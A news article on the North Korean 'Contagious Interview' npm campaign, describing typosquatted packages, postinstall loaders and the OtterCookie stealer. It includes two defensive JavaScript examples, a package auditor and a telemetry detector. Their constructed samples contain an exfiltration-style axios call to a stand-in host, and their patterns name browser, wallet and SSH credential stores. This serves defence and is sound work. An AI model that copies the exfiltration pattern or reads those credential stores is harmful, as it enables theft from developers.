
North Korean Hackers Target Developers with Nearly 200 Malicious NPM Packages in “Contagious Interview” Hacking Campaign

North Korean hackers continue to poison npm packages with malicious JavaScript libraries targeting developers in the ongoing Contagious Interview campaign.

In the month after October 10, 2025, the attackers published 197 additional malicious npm packages that accumulated more than 31,000 downloads, a tempo that suggests they have made the JavaScript ecosystem their preferred delivery channel.

“This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm, and it shows how thoroughly North Korean threat actors have adapted their tooling to modern JavaScript and crypto-centric development workflows,” Socket researchers stated.

Between July 14 and October 10, 2025, the previous Contagious Interview campaign had introduced 338 malicious packages, with over 50,000 total downloads.

North Korean hackers target Web3 and blockchain developers with malicious npm packages

According to Socket's Threat Research Team, the attackers approach blockchain and Web3 developers with fake job interviews and take-home test assignments that lead the candidate to download and install the malicious npm packages.

They disguise the malicious libraries as useful, harmless utilities with plausible names such as tailwind-magic, node-tailwind, and react-modal-select.

Others include bcryptjs-node, cross-sessions, json-oauth, react-adparser, session-keeper, tailwindcss-forms, and webpack-loadcss. At least 15 of the malicious packages were still live on the npm registry at the time of publication.

Some of the packages, such as tailwind-magic, typosquat well-known libraries (in this case tailwind-merge) and reproduce the legitimate library's exported behavior, differing only in what runs at install time, so a developer who knows the original sees nothing unusual when using it.

“The code exported from dist/ behaves like a normal Tailwind class-merging utility, but a postinstall script executes src/lib/index.js, which uses axios to call the threat actor-controlled endpoint,” they wrote.
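The pattern the researchers describe, a harmless public API under dist/ paired with an install hook that runs a file elsewhere in the tree and phones home, can be caught before `npm install` ever executes the hook by unpacking the tarball (`npm pack <name>`) and auditing the manifest. The following is an added example, not Socket's code and not the code of any package named in the article; the manifest, file contents and module list are constructed for illustration, and the helper names (`auditPackage`, `scriptTarget`) are this example's own.

```javascript
// Added example (not Socket's or any npm package's code): a static audit of an
// unpacked npm package for install-time hooks that run code outside the shipped
// API and pull in network or process-spawning modules. All sample data below is
// constructed; it is not the real tailwind-magic package.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Modules whose presence in an install-time script usually means a network
// call or a process spawn, which a class-merging utility has no reason to do.
const SUSPICIOUS_REQUIRES = ["axios", "node-fetch", "https", "http", "child_process", "net", "dns"];

/** Return every lifecycle hook that can run during `npm install`. */
function findInstallHooks(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h] }));
}

/** Extract the JS file a hook command hands to node, e.g. "node src/lib/index.js". */
function scriptTarget(command) {
  const m = command.match(/\bnode\s+(?:-[^\s]+\s+)*([^\s;&|]+\.[cm]?js)/);
  return m ? m[1] : null;
}

/** Does the shipped API (package.json "main") live in a different top-level dir than the hook target? */
function entryPointMismatch(manifest, target) {
  const main = manifest.main || "";
  const apiDir = main.replace(/^\.\//, "").split("/")[0];
  const hookDir = target.replace(/^\.\//, "").split("/")[0];
  return Boolean(apiDir && hookDir && apiDir !== hookDir);
}

/** Find require()/import of modules that reach the network or spawn processes. */
function suspiciousImports(source) {
  const found = new Set();
  const re = /(?:require\(\s*|from\s+)["']([^"']+)["']/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const mod = m[1].replace(/^node:/, "");
    if (SUSPICIOUS_REQUIRES.includes(mod)) found.add(mod);
  }
  return [...found];
}

/**
 * Audit one package. `files` maps relative paths to their contents, as obtained
 * from unpacking `npm pack <name>` (no scripts run during pack/extract).
 */
function auditPackage(manifest, files) {
  const findings = [];
  for (const { hook, command } of findInstallHooks(manifest)) {
    findings.push(`lifecycle hook "${hook}" runs: ${command}`);
    const target = scriptTarget(command);
    if (!target) continue;
    if (entryPointMismatch(manifest, target)) {
      findings.push(`hook runs ${target}, outside the shipped API in ${manifest.main}`);
    }
    const source = files[target];
    if (source === undefined) {
      findings.push(`hook target ${target} is not in the package tarball`);
      continue;
    }
    for (const mod of suspiciousImports(source)) findings.push(`${target} imports ${mod}`);
  }
  return findings;
}

// Constructed sample shaped like the pattern in the article: clean dist/, hook in src/.
const SUSPECT_MANIFEST = {
  name: "example-tailwind-utility",
  version: "1.0.0",
  main: "dist/index.js",
  scripts: { build: "tsc", postinstall: "node src/lib/index.js" },
  dependencies: { axios: "^1.6.0" },
};
const SUSPECT_FILES = {
  "dist/index.js": "module.exports = { twMerge: (...c) => c.join(' ') };",
  "src/lib/index.js":
    "const axios = require('axios');\n" +
    "axios.post('https://example.invalid/collect', { host: require('os').hostname() });",
};

// Constructed sample of a package with no install hooks at all.
const BENIGN_MANIFEST = {
  name: "example-clean", version: "1.0.0", main: "dist/index.js",
  scripts: { build: "tsc", test: "vitest" },
};

function demo() {
  return { suspect: auditPackage(SUSPECT_MANIFEST, SUSPECT_FILES), benign: auditPackage(BENIGN_MANIFEST, {}) };
}

module.exports = { findInstallHooks, scriptTarget, entryPointMismatch, suspiciousImports, auditPackage, demo };
```

Running `demo()` yields three findings for the suspect package (the postinstall hook, the dist/ versus src/ mismatch, and the axios import) and none for the clean one. The cheapest blanket mitigation is `npm config set ignore-scripts true` on developer machines, with hooks re-enabled per package only after this kind of review.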

The attackers also build convincing clones of crypto-themed projects and front-ends to make the lures more believable to blockchain developers.

“In addition, we analyzed repositories named after crypto-themed projects, including a cloned Knightsbridge DEX front-end (dexproject) wired to the malicious node-tailwind package, as well as numerous token- and DeFi-branded repositories used as lures,” the researchers said.

North Korean hackers have been involved in other crypto-themed hacking campaigns. In 2022, they distributed a trojanized cryptocurrency application, AppleJeus, targeting blockchain companies, DeFi firms, and holders of large crypto assets.

Cybersecurity researchers have described Contagious Interview as an industrial-scale campaign against the software supply chain.

“Contagious Interview is an industrialized software supply chain campaign, not a one-off backdoor,” warned Collin Hogue-Spears, Senior Director of Solution Management at Black Duck. “State-sponsored attackers are recruiting companies’ software developers through fake job interviews, and one malicious ‘take-home test’ on a corporate laptop gives them the access that an insider would have, without ever appearing on your payroll.”

North Korean hackers distribute OtterCookie via Vercel C2 servers

The attackers deliver the malware through infrastructure split across legitimate platforms, such as Vercel and GitHub, which blends the traffic in with ordinary developer activity.

According to the researchers, the malicious npm packages contact a Vercel-hosted command-and-control endpoint at tetrismic[.]vercel[.]app, which serves the OtterCookie payload maintained in a GitHub repository under the threat actor's account stardev0914. That account was linked to at least 18 of the malicious npm packages and has since been removed.

“The threat actors split this infrastructure into three components. GitHub hosts the development repository. Vercel serves the current payload on demand. A separate C2 server receives data and issues tasks once the loader runs, which isolates operations,” they explained.

OtterCookie, which the researchers describe as a BeaverTail variant, connects to a command-and-control server and opens a remote shell, giving the operators persistent access to the developer's machine.

The cross-platform payload steals browser and crypto wallet credentials, copies clipboard contents, records keystrokes, and takes screenshots. It also recursively searches the file system for sensitive documents and uploads them to a threat-actor-controlled server.

To evade analysis, the payload first checks whether it is running inside a virtual machine or sandbox and withholds its malicious behavior if it is, so that automated analysis environments and researchers see an inert sample.
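Because the loader runs from an `npm install`, the behaviors listed above (credential-store reads, document harvesting, egress to a non-registry host) all share one tell: the acting process descends from npm's lifecycle runner. The following detection pass over endpoint telemetry is an added example, not Socket's, OtterCookie's or any EDR vendor's code; the event schema, process table, sample events, threshold and allowlist are constructed assumptions for illustration, and real telemetry fields differ.

```javascript
// Added example (not Socket's, OtterCookie's or any EDR vendor's code): flag
// install-time child processes that reach into credential stores, harvest
// documents, or connect to hosts other than the package registry. The process
// table, event shape and sample events are constructed; only the Chromium
// "Login Data" filename and the MetaMask extension id are real artefacts.

// Paths an install script has no legitimate reason to read.
const CREDENTIAL_STORE_PATTERNS = [
  /Login Data$/,                       // Chromium saved-password database
  /nkbihfbeogaeaoehlefnkodbefgpgknn/,  // MetaMask extension storage directory
  /\.ssh\/id_[a-z0-9]+$/,              // SSH private keys
  /\.config\/solana\/id\.json$/,       // Solana CLI keypair
];
const DOC_EXTENSIONS = /\.(env|pem|key|docx?|xlsx?|pdf)$/i;
const DOC_HARVEST_THRESHOLD = 3;                 // assumed tuning value
const EGRESS_ALLOWLIST = new Set(["registry.npmjs.org"]); // mirror your org's registry/proxy here

/** Walk parent pointers to decide whether a process descends from an `npm install`. */
function spawnedByNpmInstall(pid, processes) {
  const seen = new Set();
  let cur = processes[pid];
  while (cur && !seen.has(cur.pid)) {
    seen.add(cur.pid);
    if (/^npm (install|ci|i)\b/.test(cur.cmdline)) return true;
    cur = processes[cur.ppid];
  }
  return false;
}

/**
 * Run the rules over a batch of events. Each event is { pid, type, ...} with
 * type "file_read" (path) or "net_connect" (host). Returns a list of alerts.
 */
function detect(processes, events) {
  const alerts = [];
  const docReads = new Map(); // pid -> count of document-like files read
  for (const ev of events) {
    if (!spawnedByNpmInstall(ev.pid, processes)) continue; // scope: install lineage only
    if (ev.type === "file_read" && CREDENTIAL_STORE_PATTERNS.some((re) => re.test(ev.path))) {
      alerts.push({ rule: "install-script-reads-credential-store", pid: ev.pid, detail: ev.path });
    } else if (ev.type === "file_read" && DOC_EXTENSIONS.test(ev.path)) {
      docReads.set(ev.pid, (docReads.get(ev.pid) || 0) + 1);
    } else if (ev.type === "net_connect" && !EGRESS_ALLOWLIST.has(ev.host)) {
      alerts.push({ rule: "install-script-network-egress", pid: ev.pid, detail: ev.host });
    }
  }
  for (const [pid, n] of docReads) {
    if (n >= DOC_HARVEST_THRESHOLD) {
      alerts.push({ rule: "install-script-harvests-documents", pid, detail: `${n} document reads` });
    }
  }
  return alerts;
}

// Constructed process table: npm -> sh -c -> node running the hook, plus an unrelated server.
const PROCESSES = {
  100: { pid: 100, ppid: 1,   cmdline: "npm install" },
  101: { pid: 101, ppid: 100, cmdline: "sh -c node src/lib/index.js" },
  102: { pid: 102, ppid: 101, cmdline: "node src/lib/index.js" },
  200: { pid: 200, ppid: 1,   cmdline: "/usr/bin/node server.js" },
};

// Constructed events: pid 102 is the hook; pid 200 is noise that must not alert.
const EVENTS = [
  { pid: 100, type: "net_connect", host: "registry.npmjs.org" },          // npm's own fetch, allowed
  { pid: 102, type: "net_connect", host: "example-c2.vercel.app" },       // constructed C2 host
  { pid: 102, type: "file_read", path: "/home/dev/.config/google-chrome/Default/Login Data" },
  { pid: 102, type: "file_read", path: "/home/dev/.config/google-chrome/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003.log" },
  { pid: 102, type: "file_read", path: "/home/dev/Documents/seed-phrase.docx" },
  { pid: 102, type: "file_read", path: "/home/dev/projects/app/.env" },
  { pid: 102, type: "file_read", path: "/home/dev/Documents/tax-2024.pdf" },
  { pid: 200, type: "file_read", path: "/home/dev/.config/google-chrome/Default/Login Data" }, // outside install lineage
  { pid: 200, type: "net_connect", host: "api.example.com" },
];

function demoDetect() {
  return detect(PROCESSES, EVENTS);
}

module.exports = { spawnedByNpmInstall, detect, demoDetect, PROCESSES, EVENTS };
```

On the constructed sample this produces four alerts, all on pid 102: one egress alert, two credential-store alerts and one document-harvest alert; the unrelated server process and npm's own registry traffic produce none. Lineage scoping is what keeps the rules quiet on a normal workstation, where the browser itself reads "Login Data" constantly.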

“The main point is that this research illustrates how advanced and organized modern supply chain attacks have become,” said Randolph Barr, Chief Information Security Officer at Cequence Security. “Socket’s investigation reveals a highly organized group of hackers running the Contagious Interview campaign. This included GitHub repositories, npm packages, staging on platforms like Vercel, and regular modifications to the payload. From my perspective, it seems just like a simplified software development lifecycle, but for malware instead of product features.”